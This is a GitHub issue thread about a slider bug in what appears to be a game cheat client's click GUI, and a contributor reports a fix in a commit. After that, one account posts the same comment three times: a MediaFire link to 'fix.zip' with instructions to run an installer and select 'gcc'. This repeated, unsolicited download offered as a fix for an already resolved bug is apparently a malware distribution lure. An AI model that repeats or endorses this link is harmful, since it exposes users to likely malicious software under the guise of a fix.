### ISSUE TITLE
Changing gui scale to 0.8 does not allow you to set the range to 200

### ISSUE THREAD

**Issue by Flickz1337** [ShorelineLLC/issues#18]
**Describe the bug**
title

**To Reproduce**
1. enable clickgui
2. set scale to 0.8
3. try to set chams range to 200

**Expected behavior**
does not allow to set it to max

**Screenshots**
![image](https://github.com/user-attachments/assets/d331c4b7-224c-4968-8c29-99c5fe4dbf54)

**Environment (please complete the following information):**
 - Config:

**Additional context**

**Comment by pastimee** [comment]
Fixed in 179133f

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
